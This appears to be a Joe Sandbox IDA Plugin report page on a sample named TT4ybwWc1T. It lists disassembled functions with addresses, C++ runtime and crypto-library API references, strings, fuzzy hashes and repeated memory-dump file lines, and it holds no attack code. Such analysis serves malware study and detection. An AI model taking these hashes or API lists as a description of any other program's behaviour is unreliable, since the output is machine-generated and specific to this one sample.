Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: _strncmptype_info::operator!=
String ID: ThisPointer:$ValueNames
API String ID: 1333309372-2375088429
Opcode ID: 4caa31c403345df81ca4e077aa07953318c976d268011ae321035e31956e3d7d
Instruction ID: 2328f50d245fe70a566e7bf93457b095624c752a85dbfabdfc8fe750834fb54e
Opcode Fuzzy Hash: 4caa31c403345df81ca4e077aa07953318c976d268011ae321035e31956e3d7d
Instruction Fuzzy Hash: 0C51A23120C3445BC3248F669995AA7B7EEAF96358F088A5CE49687F81DB22EC0D8751

Uniqueness

Uniqueness Score: -1.00%

Function 6C93B9B0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

type_info::operator!=.LIBCMT ref: 6C93BA47
_strncmp.LIBCMT ref: 6C93BAC6

Strings

ValueNames, xrefs: 6C93B9D7
ThisPointer:, xrefs: 6C93BA6B, 6C93BAC0

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: _strncmptype_info::operator!=
String ID: ThisPointer:$ValueNames
API String ID: 1333309372-2375088429
Opcode ID: 47257f728814d99cc03e94606c80d6158531aab8e6b181c1bab88120bcb96899
Instruction ID: 387faae108cfff691cdc7bd751928bbb16cd35738214a593500e1198a15e6300
Opcode Fuzzy Hash: 47257f728814d99cc03e94606c80d6158531aab8e6b181c1bab88120bcb96899
Instruction Fuzzy Hash: 6951D531208B445BC724CF69C890E67B7FEAF9635CF088A1DE4DA87B41DB22E808C751

Uniqueness

Uniqueness Score: -1.00%

Function 6C921B70 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 165COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6C921C1A

Part of subcall function 6C94AC75: RaiseException.KERNEL32(?,?,6C949C34,65628154,?,?,?,?,6C949C34,65628154,6C979C90,6C98B974,65628154), ref: 6C94ACB7

__CxxThrowException@8.LIBCMT ref: 6C921CDE
__CxxThrowException@8.LIBCMT ref: 6C921D3E

Strings

TF_SignerBase: this algorithm does not support messsage recovery or the key is too short, xrefs: 6C921C67
TF_SignerBase: the recoverable message part is too long for the given key and algorithm, xrefs: 6C921CF0

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: TF_SignerBase: the recoverable message part is too long for the given key and algorithm$TF_SignerBase: this algorithm does not support messsage recovery or the key is too short
API String ID: 3476068407-3371871069
Opcode ID: a3eba9c1e7d71b6fe6f2f4ebde5b0a40152870540a67da50c6e5828f53e68acb
Instruction ID: 75efb6e6f6fbad72772d1bcad960e707a932edeeb92dd8b042ecc85a93068053
Opcode Fuzzy Hash: a3eba9c1e7d71b6fe6f2f4ebde5b0a40152870540a67da50c6e5828f53e68acb
Instruction Fuzzy Hash: AE5158752083409FD360DF68C880F9AB7E9BFDD304F108A1DE59987791DB74E9098BA2

Uniqueness

Uniqueness Score: -1.00%

Function 6C8E4010 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6C8E402A

Part of subcall function 6C949125: std::exception::exception.LIBCMT ref: 6C94913A
Part of subcall function 6C949125: __CxxThrowException@8.LIBCMT ref: 6C94914F
Part of subcall function 6C949125: std::exception::exception.LIBCMT ref: 6C949160

std::_Xinvalid_argument.LIBCPMT ref: 6C8E4067

Part of subcall function 6C9490D8: std::exception::exception.LIBCMT ref: 6C9490ED
Part of subcall function 6C9490D8: __CxxThrowException@8.LIBCMT ref: 6C949102
Part of subcall function 6C9490D8: std::exception::exception.LIBCMT ref: 6C949113

_memmove.LIBCMT ref: 6C8E40C8

Strings

string too long, xrefs: 6C8E4062
invalid string position, xrefs: 6C8E4025

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 1615890066-4289949731
Opcode ID: 9845c785fd1663d613db0c5191a2117dc77adf5c6f0b4d09c66c1f49cf6998e6
Instruction ID: 54700b470be70d2163e13aec26ef96b3ff8bb7a15f21311eef2b6b21bc39cd36
Opcode Fuzzy Hash: 9845c785fd1663d613db0c5191a2117dc77adf5c6f0b4d09c66c1f49cf6998e6
Instruction Fuzzy Hash: 7F31CA323041149BD7308E9CE980A5AF7A9DBDA769F250E3FE155CBB40D762DC408791

Uniqueness

Uniqueness Score: -1.00%

Function 6C94C23B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 6C94C24E

Part of subcall function 6C94C1A9: ___BuildCatchObjectHelper.LIBCMT ref: 6C94C1DF

_UnwindNestedFrames.LIBCMT ref: 6C94C265
___FrameUnwindToState.LIBCMT ref: 6C94C273

Strings

csm, xrefs: 6C94C24A, 6C94C25F, 6C94C272, 6C94C290, 6C94C2A0
csm, xrefs: 6C94C23D

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm$csm
API String ID: 2163707966-3733052814
Opcode ID: 2a3f766c9b4dac2ca2754d74b5085f77c001a70fed88627ce95d418e20d78339
Instruction ID: 99e51536c4e26be6122b501701f9b0dd72dcc237a04f09806ec3fe1dd5154acb
Opcode Fuzzy Hash: 2a3f766c9b4dac2ca2754d74b5085f77c001a70fed88627ce95d418e20d78339
Instruction Fuzzy Hash: 9A01F631401549BFDF126F91CC45EEA7F6AFF28358F108020BD1815A20DB76D9B6DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 6C922300 Relevance: 7.8, APIs: 5, Instructions: 257COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 6C9223F3
_memmove.LIBCMT ref: 6C922460

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: ca67b60ce6857e08f27e97ee2d188a5516436edf290935c7e7383fb2ea664241
Instruction ID: de83008dc394ff8938536f13b07be207a2c41488b86c730c96bda87e3b65eac8
Opcode Fuzzy Hash: ca67b60ce6857e08f27e97ee2d188a5516436edf290935c7e7383fb2ea664241
Instruction Fuzzy Hash: C19191B12287019FD714CF58D984A6BB7E9FBD8714F104A2DE495C3B44E738E905CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6C911D50 Relevance: 7.6, APIs: 5, Instructions: 144timesleepCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM(65628154), ref: 6C911D91
timeGetTime.WINMM(65628154), ref: 6C911D9F
timeGetTime.WINMM ref: 6C911DBB
timeGetTime.WINMM ref: 6C911DC9
Sleep.KERNEL32(00000032), ref: 6C911DDC

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Timetime$Sleep
String ID:
API String ID: 4176159691-0
Opcode ID: d4f6242d584504dc065689c992802bb76e394c1a573878447ee0b1577ace978a
Instruction ID: 84c6dbcabf47f8fd44908ad0ffcd46467883f1b5e943d4658ec5738e87336f0c
Opcode Fuzzy Hash: d4f6242d584504dc065689c992802bb76e394c1a573878447ee0b1577ace978a
Instruction Fuzzy Hash: 1151D4B1A09248AFEB10DFE8C98679D7FB8AB27344F25897AD408D7B40D371D544CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6C8F6D40 Relevance: 7.6, APIs: 5, Instructions: 101COMMON

Download Yara Rule

APIs

Part of subcall function 6C949BB5: _malloc.LIBCMT ref: 6C949BCF

_rand.LIBCMT ref: 6C8F6DEA

Part of subcall function 6C949E0C: __getptd.LIBCMT ref: 6C949E0C

std::exception::exception.LIBCMT ref: 6C8F6E17
__CxxThrowException@8.LIBCMT ref: 6C8F6E2C
std::exception::exception.LIBCMT ref: 6C8F6E3B
__CxxThrowException@8.LIBCMT ref: 6C8F6E50

Part of subcall function 6C949BB5: std::exception::exception.LIBCMT ref: 6C949C04
Part of subcall function 6C949BB5: std::exception::exception.LIBCMT ref: 6C949C1E
Part of subcall function 6C949BB5: __CxxThrowException@8.LIBCMT ref: 6C949C2F

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw$__getptd_malloc_rand
String ID:
API String ID: 2791304714-0
Opcode ID: 51c84ec87bccf69592167baad3368febadf5959f0678664717b37343bddf875c
Instruction ID: 2b6e8811ad33c727a37e79cbc39a7817fea28b0f54aab8241ca7c07fe5f6f5f6
Opcode Fuzzy Hash: 51c84ec87bccf69592167baad3368febadf5959f0678664717b37343bddf875c
Instruction Fuzzy Hash: 323133B19007449FC760CF68C980A8ABBF4FB29314F54C96ED89A97B41D731E608CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6C8F7750 Relevance: 7.6, APIs: 5, Instructions: 79COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000000,?,?), ref: 6C8F7761
LeaveCriticalSection.KERNEL32(00000000,?), ref: 6C8F7782
EnterCriticalSection.KERNEL32(00000018), ref: 6C8F7796
LeaveCriticalSection.KERNEL32(00000018), ref: 6C8F77CE
QueueUserWorkItem.KERNEL32(6C911D50,00000000,00000010), ref: 6C8F780C

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: CriticalSection$EnterLeave$ItemQueueUserWork
String ID:
API String ID: 584243675-0
Opcode ID: 43f227220a4352f67e56851fb0405d73368ed49b343741b691755e49c75d38ce
Instruction ID: 2b90217007288e19e5cda2427196303cc91183c0beed3069746c45e08db488b5
Opcode Fuzzy Hash: 43f227220a4352f67e56851fb0405d73368ed49b343741b691755e49c75d38ce
Instruction Fuzzy Hash: 62218375515208EFEB10CFA4DA44AABBBF8FB46344F10896DE46687A40D770E549CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6C8E5AAC Relevance: 7.6, APIs: 5, Instructions: 59COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 6C8E5ACB

Part of subcall function 6C949533: std::exception::_Copy_str.LIBCMT ref: 6C94954E

__CxxThrowException@8.LIBCMT ref: 6C8E5ABC

Part of subcall function 6C94AC75: RaiseException.KERNEL32(?,?,6C949C34,65628154,?,?,?,?,6C949C34,65628154,6C979C90,6C98B974,65628154), ref: 6C94ACB7

__CxxThrowException@8.LIBCMT ref: 6C8E5AE0

Part of subcall function 6C949BB5: _malloc.LIBCMT ref: 6C949BCF

std::exception::exception.LIBCMT ref: 6C8E5B18
__CxxThrowException@8.LIBCMT ref: 6C8E5B2D

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Exception@8Throw$std::exception::exception$Copy_strExceptionRaise_mallocstd::exception::_
String ID:
API String ID: 921928366-0
Opcode ID: b906a82be28f6be83738657a4ac836e68216c7563ea3eebaf557df6d20d6c555
Instruction ID: 0fdc0ba1f9e65f311102c3d41bcd0368b4be01b4f4fd6721616a05d9172e40c2
Opcode Fuzzy Hash: b906a82be28f6be83738657a4ac836e68216c7563ea3eebaf557df6d20d6c555
Instruction Fuzzy Hash: 8C0180B28102086BDB14DFA5D9419DE77BCEF79304F00C569E809A7A40EB30DA08CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6C94F03B Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6C94F047

Part of subcall function 6C94EAE6: __getptd_noexit.LIBCMT ref: 6C94EAE9
Part of subcall function 6C94EAE6: __amsg_exit.LIBCMT ref: 6C94EAF6

__amsg_exit.LIBCMT ref: 6C94F067
__lock.LIBCMT ref: 6C94F077
InterlockedDecrement.KERNEL32(?), ref: 6C94F094
InterlockedIncrement.KERNEL32(07101668), ref: 6C94F0BF

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 8e69f65017c3facb04bb8f1efce6c0b3d5ad4f62c90a3a89d3f07724e7ca56e1
Instruction ID: a25297f00c4eb36319a939c82a8fd6b02ec95d62e6e6cd959f0ffbd3cef00dc5
Opcode Fuzzy Hash: 8e69f65017c3facb04bb8f1efce6c0b3d5ad4f62c90a3a89d3f07724e7ca56e1
Instruction Fuzzy Hash: 81018431A07612DBDB119B65C00479E7778BF6771EF218545E82467F84CB34D845CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6C94F7BC Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6C94F7C8

Part of subcall function 6C94EAE6: __getptd_noexit.LIBCMT ref: 6C94EAE9
Part of subcall function 6C94EAE6: __amsg_exit.LIBCMT ref: 6C94EAF6

__getptd.LIBCMT ref: 6C94F7DF
__amsg_exit.LIBCMT ref: 6C94F7ED
__lock.LIBCMT ref: 6C94F7FD
__updatetlocinfoEx_nolock.LIBCMT ref: 6C94F811

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: edb828c11af10c4b10916ec3100ddfa517092f341226d1d4887f4018679ec980
Instruction ID: ceb34d79a1504c225431c566c19c69ed1cafb44882a4eb54727fb21a995b0d91
Opcode Fuzzy Hash: edb828c11af10c4b10916ec3100ddfa517092f341226d1d4887f4018679ec980
Instruction Fuzzy Hash: 3CF096329456019BEB20ABF89405B8D72A06F31B2CF35C549E41057BC0DF28D5448AA5

Uniqueness

Uniqueness Score: -1.00%

Function 6C92E6E0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 331COMMON

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 6C92E76F
_memcpy_s.LIBCMT ref: 6C92E78B

Strings

, xrefs: 6C92E85A

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: _memcpy_s
String ID:
API String ID: 2001391462-3916222277
Opcode ID: f8038e90bd5f64a436925cb3ff4b58b405efcbdf005b4396be4fd6f6a9e9ee0b
Instruction ID: ac58a98a6d06e232f7dcb29bbd5933927dbcd7e74e57cbed168785620fd1cca5
Opcode Fuzzy Hash: f8038e90bd5f64a436925cb3ff4b58b405efcbdf005b4396be4fd6f6a9e9ee0b
Instruction Fuzzy Hash: 37C179756193028FD704CE38C89066AB7E9FFC9319F144A2DE4D5C7658E738EA49CB82

Uniqueness

Uniqueness Score: -1.00%

Function 6C948B60 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 252COMMON

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 6C948C40
_memset.LIBCMT ref: 6C948C56
_memmove.LIBCMT ref: 6C948DA8

Strings

EncodingParameters, xrefs: 6C948CD6

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
